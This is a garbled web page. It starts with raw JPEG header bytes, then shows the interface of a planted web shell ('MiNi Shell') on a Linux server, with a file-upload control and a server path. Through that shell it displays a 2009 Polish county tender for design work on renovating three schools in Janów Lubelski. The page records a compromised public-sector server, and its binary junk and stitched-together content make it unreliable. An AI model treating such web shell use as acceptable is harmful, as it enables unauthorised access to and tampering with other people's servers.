JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090527/169370-N-2009.html

<p class="kh_header"><b>Janów Lubelski: Wykonanie dokumentacji projektowej na wykonanie prac remontowych pod nazwą  - Poprawa jakości istniejących obiektów dydaktycznych społeczno - edukacyjnych kształcenia praktycznego oraz sportowych w Janowie Lubelskim 
będących własnością powiatu janowskiego. Prace remontowe mają dotyczyć budynków w 3 szkołach ponadpodstawowych będących jednostkami organizacyjnymi powiatu janowskiego.</b><br>
<b>Numer ogłoszenia: 169370 - 2009; data zamieszczenia: 27.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Janowie Lubelskim , ul. Zamoyskiego 59, 23-300 Janów Lubelski, woj. lubelskie, tel. 015 8723070, 8720309, faks 015 8723070.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatjanowski.pl/bip</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej na wykonanie prac remontowych pod nazwą  - Poprawa jakości istniejących obiektów dydaktycznych społeczno - edukacyjnych kształcenia praktycznego oraz sportowych w Janowie Lubelskim 
będących własnością powiatu janowskiego. Prace remontowe mają dotyczyć budynków w 3 szkołach ponadpodstawowych będących jednostkami organizacyjnymi powiatu janowskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.     Zespół Szkół w Janowie Lubelskim . 
 1. Budynek dydaktyczny ul. Zamoyskiego 68.
Powierzchnia zabudowy   - 	431,30m2
Powierzchnia użytkowa    -  692,72 m2
Kubatura budynku           - 	5 265 m3
Zakres prac remontowych objętych zamówieniem.
-wymiana instalacji centralnego ogrzewania,
-wymiana instalacji elektrycznej.
2. Budynek dydaktyczny ul. Wyszyńskiego 33.
Powierzchnia zabudowy  - 	336,0 m2
Powierzchnia użytkowa   -	532,8 m2
      Kubatura budynku    - 	3 125 m3
Zakres prac remontowych objętych zamówieniem:
-wymiana pokrycia dachu z blachy na blachę trapezową powlekaną,
-wymiana pokrycia z papy na pokrycie papą termozgrzewalną,
-ocieplenie poddaszy wełną mineralną i granulatem z wełny mineralnej,
-izolacja pionowa ścian fundamentowych,
-ocieplenie ścian styropianem z wyprawą z tynku cienkowarstwowego,
-wymiana okien drewnianych na okna z PCV,
-wymiana drzwi  zewnętrznych drewnianych na drzwi aluminiowe,
-wymiana instalacji elektrycznej,
-wymiana instalacji centralnego ogrzewania,
-wymiana urządzeń kotłowni węglowej na gazową.
Uwaga:
Budynek dydaktyczny przy ul. Wyszyńskiego - Zamawiający posiada audyt energetyczny. Do projektowania w zakresie prac termomodernizacyjnych należy przyjąć zakres audytu w całości tj. wariant W I. 
Ponadto Zamawiający posiada inwentaryzację przedmiotowego obiektu, która zostanie przekazana wykonawcy zamówienia po zawarciu umowy.
Budynek dydaktyczny przy ul. Zamoyskiego 68 - Zamawiający nie posiada inwentaryzacji.
II.Zespól Szkół Zawodowych w Janowie Lubelskim ul. Ogrodowa 20.
1. Budynek dydaktyczny wraz z salą gimnastyczną z łącznikiem.
Powierzchnia zabudowy   - 	1366,5 m2
Powierzchnia użytkowa    -	3200,12 m2
Kubatura budynku           - 	15066 m3
Zakres prac remontowych objętych zamówieniem:
-wymiana stolarki okiennej drewnianej na okna z PCV (dotychczas nie wymienionych),
-izolacja pionowa przeciwwilgociowa ścian piwnic z odkopaniem i zasypaniem wykopu,
-docieplenie ścian piwnic i cokołu styrodurem,
-termorenowacja ścian budynku; ocieplenie styropianem gr. 12cm z tynkiem cienkowarstwowym mineralnym, na cokole tynk mozaikowy,
-ocieplenie dachu,
-wymiana instalacji centralnego ogrzewania z grzejnikami,
-wymiana instalacji elektrycznej z oprawami i osprzętem,
-opaska wokół budynku z kostki brukowej szer. 70cm.
-rozebranie istniejącej podłogi w sali gimnastycznej w podpiwniczeniu,
-wykonanie nowych warstw posadzkowych z izolacją przeciwwilgociową w sali gimnastycznej,
-wykonanie nowej podłogi sportowej Lumaflex Training w sali gimnastycznej.
2. Internat ze stołówką i kotłownią.   
 Internat.
Powierzchnia zabudowy   - 	787,86 m2
Powierzchnia użytkowa    -  1 762,43 m2
Kubatura budynku          - 	7 165 m3
Stołówka z kotłownią.
Powierzchnia zabudowy    -  578,20 m2
Powierzchnia użytkowa    -	929,47 m2
Kubatura budynku           - 	2 736 m3
Zakres prac remontowych objętych zamówieniem:
-wymiana pokrycia papowego dachu na pokrycie z papy termozgrzewalnej,
-docieplenie stropodachu granulatem z wełny mineralnej wdmuchiwanym,
-wymiana stolarki okiennej drewnianej na okna z PCV,
-wymiana drzwi zewnętrznych drewnianych na drzwi aluminiowe,
-wykonanie izolacji przeciwwilgociowej ścian piwnic z odkopaniem i zasypaniem wykopu,
-izolacja ścian piwnic i cokołu styrodurem,
-ocieplenie ścian zewnętrznych styropianem gr. 12cm z tynkiem cienkowarstwowym,
-tynk cokołu mozaikowy,
-remont kuchni ze stołówką: wymiana podłóg i izolacji, wymiana okładzin ścian, wymiana stolarki drzwiowej, wymiana urządzeń sanitarnych, wymiana instalacji elektrycznej, 
-remont sanitariatów w internacie: wymiana ścianek działowych, wymiana podłoży, izolacji, posadzek ceramicznych, wymiana stolarki drewnianej, nowe tynki i okładziny ścian z glazury, malowanie, wymiana instalacji c.o., wod. - kan., wymiana urządzeń sanitarnych, wymiana instalacji elektrycznej z oprawami i osprzętem,
-wymiana instalacji centralnego ogrzewania z grzejnikami w całym budynku,
-wymiana instalacji elektrycznej z oprawami i osprzętem,
-wykonanie opaski wokół budynku z kostki brukowej szer. 70cm.
3. Warsztaty.
Powierzchnia zabudowy    - 	3 222,249 m2
Powierzchnia użytkowa      -	2 911,28 m2
Kubatura budynku            - 18 428 m3
Zakres prac remontowych objętych zamówieniem:
-ocieplenie stropodachu płytami styropianowymi lamelowymi gr. 12cm,
-pokrycie dachu 2x papą termozgrzewalną,
-wymiana instalacji odgromowej,
-remont sanitariatów w warsztatach: wymiana ścianek działowych, wymiana podłoży, izolacji, posadzek ceramicznych, wymiana stolarki drzwiowej, nowe tynki i okładziny ścian z glazury, malowanie, wymiana instalacji c.o., wod - kan, wymiana urządzeń sanitarnych, wymiana instalacji elektrycznej z oprawami i osprzętem,
-wymiana posadzki w 2-ch pomieszczeniach warsztatowych z izolacją poziomą i posadzką z betonu B-25.
4. Prace projektowe związane z przebudową istniejącego boiska wielofunkcyjnego   (na którego przebudowę Zamawiający posiada projekt). 
Zakres prac objętych zamówieniem:
-  Wykonanie projektu odprowadzenia wód opadowych z boiska zgodnie z warunkami technicznymi określonymi przez Burmistrza Janowa Lubelskiego nr KR.V.7062-30/08      z dn. 27.11.2008r. to jest: przyłącze do studzienki deszczowej musi być wykonane rurą    o minimalnej średnicy 400 milimetrów o długości około 90 metrów (do końca budynku internatu), następny odcinek przyłącza w kierunku boiska wykonać rurą o średnicy minimum 400 milimetrów.
-  Doprojektowanie monitoringu - z możliwością zapisu na rejestratorze wraz z przekazem obrazu(tzw. streaming). Projekt musi obejmować zainstalowania 3 kamer zewnętrznych  o parametrach: rozdzielczości minimum 500x582 pixeli oraz przekaz   w obrazie kolorowym.
-Doprojektowanie nagłośnienia.
-Doprojektowanie zewnętrznej tablicy wyników sportowych - sterowanie tablicy bezprzewodowe z pilota, na konstrukcji wsporczej demontowalnej. 
     Wskazane parametry:
a)rzeczywisty czas gry od 0 d 90 minut,
b)wskazywany wynik gry
c)sygnał dźwiękowy,
d)zasilanie 230 V
Uwaga:
1. Zamawiający posiada audyty energetyczne na n/w budynki szkoły, tj. 
a)Warsztaty
b)Budynek dydaktyczny wraz z salą gimnastyczną z łącznikiem.
c)Budynek internatu wraz ze stołówką.
Ad. a) Do projektowania w zakresie prac termomodernizacyjnych należy przyjąć zakres audytu w wariancie W III.
Ad. b i c) Do projektowania w zakresie prac termomodernizacyjnych należy przyjąć zakres audytu w całości tj. wariant W I.
Zamawiający posiada inwentaryzację przedmiotowych budynków, która zostanie przekazana Wykonawcy zamówienia po zawarciu umowy.
2. Prace projektowe związane z boiskiem wielofunkcyjnym mają być kompatybilne  z posiadanym przez Zamawiającego projektem budowlanym architektoniczno-konstrukcyjnym przebudowy boisk sportowych przy Zespole Szkół Zawodowych.
III.Liceum Ogólnokształcące w Janowie Lubelskim ul. Jana Pawła II Nr 1. 
1. Budynek sali gimnastycznej połączony z budynkiem gospodarczym wchodzi w skład budynków Liceum Ogólnokształcącego w Janowie Lubelskim.
Powierzchnia zabudowy  - 	   709,42 m2
Powierzchnia użytkowa  -	1 084,52 m2
Kubatura budynku         - 	6 240 m3
Zakres prac remontowych objętych zamówieniem:
-izolacja pionowa przeciwwilgociowa ścian piwnic z dociepleniem,
-wykonanie docieplenia ścian i cokołów styropianem z tynkiem cienkowarstwowym,
-ocieplenie stropów wełną mineralną i granulatem z wełny mineralnej,
-wymiana instalacji centralnego ogrzewania,
-wykonanie opaski wokół budynku z kostki brukowej.
Uwaga: 
1.Do projektowania w zakresie prac termomodernizacyjnych należy przyjąć zakres audytu  w całości tj. wariant W I.
2.Zamawiający posiada inwentaryzację przedmiotowych obiektów, która zostanie przekazana Wykonawcy zamówienia po zawarciu umowy.
ZAKRES OPRACOWANIA.
Zakres opracowania dokumentacyjnego powinien zawierać:
-dokonanie niezbędnych uzgodnień wymaganych przepisami prawa,                               
-pozyskanie wszelkich dokumentów i dokonanie uzgodnień niezbędnych do wykonania prac projektowych koniecznych do zrealizowania zadania,
-wykonanie niezbędnych map do celów projektowych,
-opracowanie dokumentacji projektowej na wykonanie prac remontowych.
W ramach zamówienia należy wykonać:
1.  projekty dla każdego obiektu odrębnie w poszczególnych branżach - 6 obiektów:
-projekty budowlano - wykonawcze termomodernizacji - 4 egz.,
-projekty budowlano - wykonawcze instalacji c.o. - 4 egz.,
-projekt budowlano -  wykonawczy kotłowni c.o. - 4 egz. 
-projekty instalacji elektrycznych wewnętrznych - 4 egz.,
-projekty remontu łazienek - 4 egz.,
-projekt remontu kuchni - 4 egz.,
-projekty niezbędnych przyłączy i kanalizacji deszczowej - 4 egz.,
2.przedmiary robót - 2 egz.
3.kosztorysy inwestorskie - 2 egz.,
4.specyfikacje techniczne wykonania i odbioru robót - 2 egz.
5.informacja BIOZ - 2 egz.
6.wersja elektroniczna  w/w dokumentów po 1 egz.
7.przygotowanie dla każdej jednostki organizacyjnej odrębnie 3 wniosków z załącznikami do uzyskania pozwolenia na budowę.
Uwagi:
1.Przed złożeniem oferty należy dokonać oględzin przedmiotowych obiektów.
2.Projekty robót budowlanych muszą odpowiadać technologii dociepleń określonej   w posiadanych przez Starostwo Powiatowe audytach energetycznych.
3.Rozwiązania materiałowe i technologiczne muszą być konsultowane z Zamawiającym.  
4.Kolorystyka  musi być uzgodniona z Zamawiającym.

W/w przedmiot zamówienia musi być sporządzony zgodnie z następującymi przepisami prawa:
1.Ustawa z dnia 7 lipca 1994 r.  - Prawo budowlane (Dz.U.Nr 207, poz. 2016 z późn.zm.)
2.Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202, poz.2072 z póź.z.m.).
3.Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U.Nr 75, poz. 690 z późn.zm.).
4.Rozporządzenie Rady Ministrów z dnia 27 kwietnia 2004 r. w sprawie określenia metod  i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym (Dz. U z dnia 8 czerwca, 2004 r. Nr 130 poz. 1389)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 54.53.00.00-8, 45.32.10.00-3, 45.33.00.00-9, 45.42.10.00-4, 45.26.00.00-7, 45.26.12.10-9, 52.61.41.01-1, 45.31.51.00-9, 45.26.25.00-6, 45.33.00.00-9, 46.32.00.00-6, 45.43.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
-posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli   ustawy nakładają obowiązek posiadania takich uprawnień;
-posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
-znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
-nie podlegają wykluczeniu z postępowania, zgodnie z art. 24 Ustawy.
Ocena spełnienia w/w warunków nastąpi na podstawie dokumentu, o którym mowa w pkt 6.  
Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu :
2.posiadają uprawnienia do wykonywania określonej działalności tj. posiadają wpis właściwego rejestru lub ewidencji działalności gospodarczej, ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów,  o których mowa pkt 7.
3.nie zalegają z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów,  o których mowa w punkcie 8.
4.wykonali w okresie ostatnich trzech lat (2006, 2007, 2008) min. 1 robotę polegającą na wykonaniu dokumentacji projektowej dot. remontu budynku (budynków) użyteczności publicznej, odpowiadającą charakterowi przedmiotu zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości nie mniejszej niż składana oferta wraz z referencjami potwierdzającymi, że praca ta została wykonana  z należytą starannością. Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów,  o których mowa w punkcie 9.
5.dysponują osobami będącymi członkami właściwej izby samorządu zawodowego, posiadającymi uprawnienia budowlane do projektowania bez ograniczeń w specjalnościach: konstrukcyjno-budowlanej, instalacyjnej w zakresie sieci, instalacji, urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów,  o których mowa w punkcie 10..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.Oświadczenie zgodne z art. 22 Ustawy podpisane przez Osoby Uprawnione, w którym Wykonawca potwierdza, że spełnia warunki udziału w postępowaniu o udzielenie Zamówienia, o których mowa w punkcie 1.
7.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej -  wystawiony nie wcześniej niż   6 miesięcy przed upływem terminu składania ofert,
a)w przypadku wspólnego  ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument ustanawiający pełnomocnika do reprezentowania ich    w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
8.aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
9.wykaz wykonanej w okresie ostatnich trzech lat (2006, 2007, 2008) min. 1 roboty polegającej na wykonaniu dokumentacji projektowej dot. remontu budynku (budynków) użyteczności publicznej, odpowiadającej charakterowi przedmiotu zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem jej wartości, daty i miejsca wykonania  i o wartości nie mniejszej niż składana oferta wraz z załączeniem dokumentów potwierdzających, że praca ta została wykonana z należytą starannością;
10.aktualne zaświadczenie (na dzień składania ofert) o wpisie na listę członków właściwej izby samorządu zawodowego, wraz   z decyzją o nadaniu uprawnień budowlanych do projektowania bez ograniczeń w specjalnościach: konstrukcyjno-budowlanej, instalacyjnej w zakresie sieci, instalacji, urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
11.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 7 i 8 składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio:
1)nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału  w postępowaniu.
2)nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne    i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu
12.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt 7 i 8, zastępuje się je dokumentem zawierającym oświadczenie  złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, wystawionych w terminach określonych w pkt  7 i 8.
13.W celu potwierdzenia spełnienie warunków wymaganych od podmiotów składających ofertę wspólną, zawartych w pkt  6 i 7 i 8 (warunki o charakterze osobistym) muszą być złożone przez każdy podmiot osobno, pozostałe tj. 9 i 10 łącznie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiatjanowski.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Janowie Lubelskim
ul. Zamoyskiego 59
23-300 Janów Lubelski.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Janowie Lubelskim
ul. Zamoyskiego 59
23-300 Janów Lubelski.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com